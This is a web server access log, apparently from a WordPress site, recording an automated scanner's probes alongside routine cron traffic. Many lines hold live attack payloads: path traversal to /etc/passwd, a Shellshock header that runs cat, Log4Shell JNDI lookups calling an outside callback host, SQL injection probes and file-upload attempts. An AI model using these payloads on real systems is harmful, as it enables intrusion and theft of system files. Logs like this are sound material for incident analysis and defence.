165.232.54.158 - - [13/Jan/2026:21:51:57 +0800] "GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:52:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768312326.5899090766906738281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:52:03 +0800] "POST /api/v1/login/oauth2/auth HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:52:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768312332.8267149925231933593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:52:09 +0800] "POST /viewlog.jsp HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:53:34 +0800] "POST /delete_cart_goods.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/102.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:53:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768312430.1487050056457519531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:53:48 +0800] "POST /?wordfence_syncAttackData=1768312428.581 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:53:46 +0800] "POST /action.php HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:55:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768312509.7526450157165527343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:55:06 +0800] "POST /homeaction.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:55:11 +0800] "GET /wp-json/wp/v2/types/post HTTP/1.1" 200 274 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:55:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768312530.9835059642791748046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:55:28 +0800] "GET /index.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (ZZ; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
165.232.54.158 - - [13/Jan/2026:21:56:27 +0800] "POST /v1/backend1 HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:56:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768312595.0495400428771972656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:21:56:33 +0800] "POST /?wordfence_syncAttackData=1768312593.4983 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:56:31 +0800] "GET /v1/38Btk9UGSxq9Fp9PHIFQCp3SEVG.php HTTP/1.1" 404 10885 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:57:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768312626.5916049480438232421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:57:03 +0800] "GET /qvisdvr/ HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:21:58:33 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:21:58:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768312723.4869120121002197265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:58:40 +0800] "GET /wp-admin/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:21:59:11 +0800] "POST /index.php HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:21:59:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768312754.9463179111480712890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:59:11 +0800] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 404 10876 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:22:00:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768312838.7239439487457275390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:00:35 +0800] "POST /cgi?2 HTTP/1.1" 404 10863 "http://nutritaste.com.au/mainFrame.htm" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:22:00:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768312845.3123319149017333984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:00:42 +0800] "POST /cgi?7 HTTP/1.1" 404 10863 "http://nutritaste.com.au/mainFrame.htm" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:00:44 +0800] "POST /./RestAPI/LogonCustomization HTTP/1.1" 403 6626 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:00:46 +0800] "POST /?wordfence_syncAttackData=1768312846.0232 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:00:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768312851.4303250312805175781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:00:48 +0800] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:22:00:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768312858.2598309516906738281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:00:55 +0800] "POST /./RestAPI/Connection HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:01:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768312865.1974759101867675781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:01:02 +0800] "GET /help/admin-guide/test.jsp HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:03:08 +0800] "GET /cgi-bin/slogin/login.py HTTP/1.1" 403 199 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
103.4.122.14 - - [13/Jan/2026:22:04:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768313048.8015320301055908203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:04:05 +0800] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
165.232.54.158 - - [13/Jan/2026:22:04:11 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
165.232.54.158 - - [13/Jan/2026:22:04:15 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [13/Jan/2026:22:08:01 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (SS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:22:08:40 +0800] "GET /?rest_route=/wp/v2/posts HTTP/1.1" 200 22 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [13/Jan/2026:22:08:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768313323.5004210472106933593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:08:40 +0800] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 22 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:09:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768313366.7210619449615478515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:09:23 +0800] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=38Btk386z1nV1qeaOM7DY9yBMXm.php:aaa HTTP/1.1" 404 10890 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:22:10:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768313451.6622920036315917968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:10:48 +0800] "GET /login.htm HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:22:10:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768313458.2127609252929687500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:10:55 +0800] "GET /formLoginAuth.htm?authCode=1&userName=admin&goURL&action=login HTTP/1.1" 404 10882 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:11:24 +0800] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 226 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [13/Jan/2026:22:11:29 +0800] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 226 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:22:11:33 +0800] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 226 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [13/Jan/2026:22:11:35 +0800] "GET /file/../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 400 226 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:11:35 +0800] "GET /file/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 226 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/112.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:11:41 +0800] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 400 226 "-" "-"
165.232.54.158 - - [13/Jan/2026:22:11:45 +0800] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 400 226 "-" "-"
165.232.54.158 - - [13/Jan/2026:22:11:49 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 403 199 "-" "-"
103.4.122.14 - - [13/Jan/2026:22:12:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768313556.7018840312957763671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:12:33 +0800] "POST /classes/Login.php?f=login HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:22:12:40 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:22:12:56 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:13:55 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:22:14:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768313652.1318991184234619140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:14:10 +0800] "POST /?wordfence_syncAttackData=1768313650.5523 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:14:08 +0800] "POST /Side.php HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [13/Jan/2026:22:14:35 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/106.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:14:52 +0800] "GET /wp-content/plugins/dzs-zoomsounds/savepng.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:17:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768313820.0831971168518066406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:16:58 +0800] "POST /?wordfence_syncAttackData=1768313818.5577 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:16:56 +0800] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:22:17:06 +0800] "POST /wp-content/plugins/wp-automatic/process_form.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:17:10 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:135.0) Gecko/20100101 Firefox/135.0"
165.232.54.158 - - [13/Jan/2026:22:17:47 +0800] "GET /?x=${jndi:ldap://${:-785}${:-702}.${hostName}.uri.d5iu610i9qj8svou82p0juxmjb8qw6gja.oast.fun/a} HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:17:51 +0800] "GET / HTTP/1.1" 403 199 "${jndi:ldap://${:-785}${:-702}.${hostName}.referer.d5iu610i9qj8svou82p0tfyp3fyjkb3km.oast.fun}" "${jndi:ldap://${:-785}${:-702}.${hostName}.useragent.d5iu610i9qj8svou82p0oibe89751w8q7.oast.fun}"
103.4.122.14 - - [13/Jan/2026:22:19:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768313986.3251550197601318359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:19:43 +0800] "GET /client/index.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/122.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:23:08 +0800] "GET /language/lang HTTP/1.1" 403 199 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:22:23:47 +0800] "GET /api/blade-user/user-list HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/106.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:23:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768314230.6280469894409179687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:23:47 +0800] "GET /api/blade-user/user-list HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:23:47 +0800] "GET /api/blade-user/user-list HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:24:11 +0800] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 403 199 "${jndi:ldap://127.0.0.1#.${hostName}.referer.d5iu610i9qj8svou82p0gqqeaeytgf7bp.oast.fun}" "${jndi:ldap://127.0.0.1#.${hostName}.useragent.d5iu610i9qj8svou82p0edr8sqsq14aoe.oast.fun}"
165.232.54.158 - - [13/Jan/2026:22:25:16 +0800] "POST /dashboard/uploadID.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:25:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768314326.0596380233764648437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:25:24 +0800] "POST /?wordfence_syncAttackData=1768314324.5379 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:25:22 +0800] "POST /ddns_check.ccp HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:29:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768314562.6168899536132812500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:29:19 +0800] "POST /apply.cgi HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [13/Jan/2026:22:29:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768314588.2519679069519042968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:29:45 +0800] "GET /index.php?p=member&destination HTTP/1.1" 301 - "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:22:31:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768314671.6278679370880126953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:31:08 +0800] "POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.1"
103.4.122.14 - - [13/Jan/2026:22:31:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768314678.2985210418701171875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:31:15 +0800] "GET /logo/38Btk38uPAY9pqGuvzekJ4WaJ3Y.txt HTTP/1.1" 404 10885 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:33:43 +0800] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:22:33:50 +0800] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:33:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768314833.4548010826110839843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:34:45 +0800] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:34:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768314894.7173309326171875000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:34:51 +0800] "PUT /cgi-bin/WC5MhG.txt HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:35:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768314902.2704410552978515625000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:34:59 +0800] "GET /cgi-bin/WC5MhG.txt HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:22:35:36 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Avira/134.0.0.0"
103.4.122.14 - - [13/Jan/2026:22:36:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768314974.7566359043121337890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:36:11 +0800] "PUT /cgi-bin/5Eo2eh.txt HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:22:36:21 +0800] "POST /wp-cron.php?doing_wp_cron=1768314981.2986540794372558593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:36:18 +0800] "DELETE /cgi-bin/5Eo2eh.txt HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
165.232.54.158 - - [13/Jan/2026:22:36:29 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:22:36:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768314990.3304779529571533203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:36:27 +0800] "GET /38Btk8N2ZgXyXeBEvggXErtRULG.txt HTTP/1.1" 404 10887 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:36:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768314997.2436668872833251953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:36:34 +0800] "PUT /38Btk8N2ZgXyXeBEvggXErtRULG.txt HTTP/1.1" 404 10887 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:36:36 +0800] "GET /login/cwp_theme/original/img/ico/favicon.ico HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Safari/604.1"
103.4.122.14 - - [13/Jan/2026:22:36:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768315004.1881399154663085937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:36:41 +0800] "GET /38Btk8N2ZgXyXeBEvggXErtRULG.txt HTTP/1.1" 404 10887 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:22:36:43 +0800] "GET /login/design/img/ico/favicon.ico HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:22:36:50 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
